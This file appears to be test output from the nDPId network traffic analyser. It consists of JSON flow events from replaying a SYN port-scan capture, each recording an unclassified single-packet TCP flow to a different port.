+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1009,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1992,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":959,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5190,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059411,"flow_last_seen":1278275059411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":422,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1988,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1303,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1098,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1045,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060072,"flow_last_seen":1278275060072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1166,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060181,"flow_last_seen":1278275060181,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 